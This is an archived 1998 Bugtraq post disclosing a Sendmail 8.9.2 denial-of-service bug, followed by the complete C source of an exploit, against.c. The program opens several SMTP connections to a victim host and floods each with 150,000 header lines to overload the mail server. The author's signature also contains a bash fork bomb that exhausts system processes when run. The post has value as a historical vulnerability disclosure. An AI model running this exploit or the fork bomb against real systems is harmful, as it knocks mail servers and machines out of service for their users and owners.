TUCoPS :: Unix :: General :: sendma.txt

[ http://www.rootshell.com/ ]
Date: 1998年12月12日 19:39:56 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want!
Hello again. Yesterday, I published some rather laconic information about
two bugs in Sendmail up to 8.9.2, and decided to post only short description
of problem + suggested patch (instead of exploit), to give developers a
chance. Unfortunately, I put together information about two completely
different problems in single posting, and it confuded a lot of people. So,
to kill any senseless discussions - again:
- The first one was 'redirection attack'; I said you could call it 'bug'
 instead of 'feature', but as noone likes anonymous mailbombing,
 network overloading / scanning, it's good to apply sendmail.cf patch
 included in original posting; without it, your relay could be abused in
 many painful ways. And yes, attack has been confirmed with 8.9.2 and
 sendmail.cf from 8.9.2 with relaying enabled. I don't think there's
 anything left to talk about. Dot.
- The second one was DoS attack during headers parsing - and this is
 a bug, *confirmed on 8.9.2*. I included simple patch to source tree.
 Unfortunately, all feedback we received from developers was one-line
 response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided
 not to publish an exploit, but now I realized there's no chance for
 response from vendors if there's no real danger. So here it is.
 Attached file, against.c, should perform very 'light' attack, only
 for testing purposes. If you noticed increased LA during attack,
 your machine is vunerable. You had enough time to patch your system
 - don't blame me, but vendors. EOF.
_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
-------------------------------------------------------------------------
/*
 against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
 (c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>
 Usage: ./against existing_user_on_victim_host victim_host
 Example: ./against nobody lamers.net
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>
#define MAXCONN 5
#define LINES 150000
struct hostent *hp;
struct sockaddr_in s;
int suck,loop,x;
int main(int argc,char* argv[]) {
 
 printf("against.c - another Sendmail DoS (up to 8.9.2)\n");
 if (argc-3) {
 printf("Usage: %s victim_user victim_host\n",argv[0]);
 exit(0);
 }
 
 hp=gethostbyname(argv[2]);
 
 if (!hp) {
 perror("gethostbyname");
 exit(1);
 }
 fprintf(stderr,"Doing mess: ");
 for (;loop<MAXCONN;loop++) if (!(x=fork())) {
 FILE* d;
 bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
 s.sin_family=hp->h_addrtype;
 s.sin_port=htons(25);
 if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
 if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
 if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }
 usleep(100000);
 fprintf(d,"helo tweety\n");
 fprintf(d,"mail from: tweety@polbox.com\n");
 fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
 fprintf(d,"data\n");
 usleep(100000);
 for(loop=0;loop<LINES;loop++) {
 if (!(loop%100)) fprintf(stderr,".");
 fprintf(d,"To: x\n");
 }
 fprintf(d,"\n\n\nsomedata\n\n\n");
 fprintf(d,".\n");
 sleep(1);
 fprintf(d,"quit\n");
 fflush(d);
 sleep(100);
 shutdown(suck,2);
 close(suck);
 exit(0);
 }
 waitpid(x,&loop,0);
 fprintf(stderr,"ok\n");
 return 0;
}